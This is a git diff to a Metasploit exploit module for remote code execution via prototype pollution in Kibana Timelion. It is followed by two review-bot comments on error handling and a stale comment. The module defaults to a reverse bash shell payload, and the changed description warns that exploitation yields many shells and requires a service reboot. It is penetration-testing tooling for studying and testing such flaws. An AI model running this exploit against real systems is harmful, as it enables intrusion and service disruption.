diff --git a/modules/exploits/linux/http/kibana_timelion_prototype_pollution_rce.rb b/modules/exploits/linux/http/kibana_timelion_prototype_pollution_rce.rb
index 0df2a18e94aa..2c3a4e7f057d 100644
--- a/modules/exploits/linux/http/kibana_timelion_prototype_pollution_rce.rb
+++ b/modules/exploits/linux/http/kibana_timelion_prototype_pollution_rce.rb
@@ -4,7 +4,7 @@
 ##
 class MetasploitModule < Msf::Exploit::Remote
- Rank = GoodRanking
+ Rank = ManualRanking
 include Msf::Exploit::Remote::HttpClient
 prepend Exploit::Remote::AutoCheck
@@ -19,7 +19,13 @@ def initialize(info = {})
 javascript code. This leads to an arbitrary command execution with permissions of the Kibana process on the host system.
- Tested against kibana 6.5.4, yielding between 43-53 shells.
+ Exploitation will require a service or system reboot to restore normal operation.
+
+ The WFSDELAY parameter is crucial for this exploit. Setting it too high will cause MANY shells
+ (50-100+), while setting it too low will cause no shells to be obtained. WFSDELAY of 10 for a
+ docker image caused 6 shells.
+
+ Tested against kibana 6.5.4.
 },
 'License' => MSF_LICENSE,
 'Author' => [
@@ -42,7 +48,7 @@ def initialize(info = {})
 'DefaultTarget' => 0,
 'DefaultOptions' => {
 'PAYLOAD' => 'cmd/unix/reverse_bash',
- 'WfsDelay' => 60 # can take a minute to run
+ 'WfsDelay' => 10 # can take a minute to run
 },
 'Notes' => {
 # the webserver doesn't die, but certain requests no longer respond before a timeout
@@ -171,14 +177,9 @@ def exploit
 print_status('Trigginger payload execution via canvas socket')
 trigger_socket
 print_status('Waiting for shells')
- rescue ::Rex::ConnectionError
- fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
- end
-
- def cleanup
+ Rex.sleep(datastore['WFSDELAY'] / 10)
 print_status('Unsetting to stop raining shells from a lacerated kibana')
 send_injection(reset: true)
 trigger_socket
- super
 end
 end
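Review bot: In the `DefaultOptions` hunk (`@@ -42,7 +48,7 @@`) the trailing comment on the new `'WfsDelay' => 10` line still reads `# can take a minute to run`, which no longer matches a ten-second default. The description added in this commit says the value directly controls how much load the target takes, so the comment should say that instead, for example `# keep low: the reset request is only sent after WfsDelay / 10 seconds, see Description`. The `DefaultOptions` hash opens and closes outside the hunk.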
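Review bot: In the last hunk (`@@ -171,14 +177,9 @@ def exploit`) the reset step, `send_injection(reset: true)` followed by `trigger_socket`, now runs only when every earlier call in `exploit` returns normally, because it moved out of `cleanup` and the `rescue ::Rex::ConnectionError` clause was removed with it. If a request raises part-way through, the tested service stays in its modified state and the operator sees a raw exception rather than `Failure::Unreachable`; the new description text already says a restart is needed to recover, so a skipped reset makes that outcome more likely. I would keep the `rescue` and run the reset from an `ensure` clause, or leave it in `cleanup`, so it is attempted on every exit path. The new `Rex.sleep(datastore['WFSDELAY'] / 10)` line also deserves a comment stating the intended unit, since the division presumably truncates to zero for values below 10. `exploit` begins outside the hunk.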